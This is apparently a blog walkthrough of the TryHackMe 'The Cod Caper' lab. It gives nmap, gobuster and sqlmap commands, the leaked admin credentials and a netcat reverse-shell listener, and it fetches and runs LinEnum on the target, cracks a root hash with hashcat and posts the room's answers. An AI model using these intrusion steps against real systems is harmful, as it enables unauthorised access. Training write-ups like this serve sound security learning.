-->

  • TryHackMe The Cod Caper Walkthrough





    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe The Cod Caper Walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    [Task 1] Intro


    Hello there my name is Pingu. I've come here to put in a request to get my fish back! My dad recently banned me from eating fish, as I wasn't eating my vegetables. He locked all the fish in a chest, and hid the key on my old pc, that he recently repurposed into a server. As all penguins are natural experts in penetration testing, I figured I could get the key myself! Unfortunately he banned every IP from Antarctica, so I am unable to do anything to the server. Therefore I call upon you my dear ally to help me get my fish back! Naturally I'll be guiding you through the process. TryHackMe The Cod Caper Walkthrough

    Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experiencing in assembly is highly recommended




    Ans :- No Needed



    [Task 2] Host Enumeration



    The first step is to see what ports and services are running on the target machine.


    Recommended Tool - nmap:


    Useful flags:


    -p :- Used to specify which port to analyze, can also be used to specify a range of ports i.e -p 1-1000



    -sC :- Runs default scripts on the port, useful for doing basic analysis on the service running on a port


    -A :- Aggressive mode, go all out and try to get as much information as possible



    #1 How many ports are open on the target machine?


    nmap 10.10.191.14





    Ans :- 2




    #2 What is the http-title of the web server?


    nmap -sC 10.10.191.15



     

    Ans :- Apache2 Ubuntu Default Page: it works





    #3 What version is the ssh service?









    nmap -sV 10.10.191.15





    Ans :- OpenSSH 7.2p2 Ubuntu 4ubuntu2.8




    #4 What is the version of the web server?


    nmap -A 10.10.191.15





    Ans :- Apache/2.4.18


    [Task 3] Web Enumeration


    Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.


    Recommended tool: gobuster


    Useful flags: 

    -x :- Used to specify file extensions i.e "php,txt,html"


    --url :- Used to specify which url to enumerate


    --wordlist :- Used to specify which wordlist that is appended on the url path i.e


    "http://url.com/word1"

    "http://url.com/word2"

    "http://url.com/word3.php"




    #1 What is the name of the important file on the server?


    gobuster -x .txt,.php,.html dir -u http://10.10.237.242 -w /usr/share/wordlists/dirb/common.txt











    ANS :- administrator.php




    [Task 4] Web Exploitation


    The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.


    Recommended Tool: sqlmap

    Useful Flags:


    -u :- Specifies which url to attack

    --forms :- Automatically selects parameters from <form> elements on the page

    --dump :- Used to retrieve data from the db once SQLI is found

    -a :- Grabs just about everything from the db



    #1 What is the admin username?


    sqlmap -u http://10.10.110.216/administrator.php --dbs --forms










    pingudad


    #2 What is the admin password?






    secretpass


    #3 How many forms of SQLI is the form vulnerable to?







    Task 5: Command Execution



    In the previous task we get the login page and using the sqlmap we get the username and password after successful login we’ll the screen like this.


    And is a vulnerable to command execution.









    After login, we have a command prompt it seems we have got the ability to run commands. We executed a command “id” and we got the right result so we tried to execute python reverse shell after executing command we got a reverse shell.




    Now we’ll the run the nc on our system to get the reverse shell of target machine.


    Payloads are given in the link provided in the description of the task


    #nc -lnvp 4444


    Here my machine will listen to the target machine on the port no. 4444


    Now one by one we’ll check the payload by running it on the command column on the above image


    Before running the payload modify the IP add and Port


    Port will be 4444

    Ip add will be on the access page of the THM (Internal Virtual IP add)


    Luckily I got the reverse shell on running the first perl payload on this page


    https://highon.coffee/blog/reverse-shell-cheat-sheet/


    Now on further enumeration, you’ll get the password in the hidden directory .


    You will find the in /var/hidden/pass directory by using find command


    #find -name pass -type f



    Task 6: LinEnum



    Step1: Prepare the Script on Your Attack Machine


    # mkdir linenum

    # cd linenum/
    LinEnum and its script can be found on GitHub


    #wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    #python -
    m SimpleHTTPServer 4444




    Step2: Download the Script on the Target Machine


    Login as SSH on the target machine


    #ssh pingu@<IP>

    pingu@ubuntu$ cd /tmp

    pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ chmod +x LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ ./LinEnum.sh



    Now look for the SUID files in the results.


    Task 10: Finishing the Job



    Now we have the hash to crack here i have the given hash to root.txt file


    We’ll use the hashcat for cracking it


    # hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt


    On completing this we’ll have the root password .



    Ans :- love2fish






     ----------------





    Video Tutorial :- 



            


    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.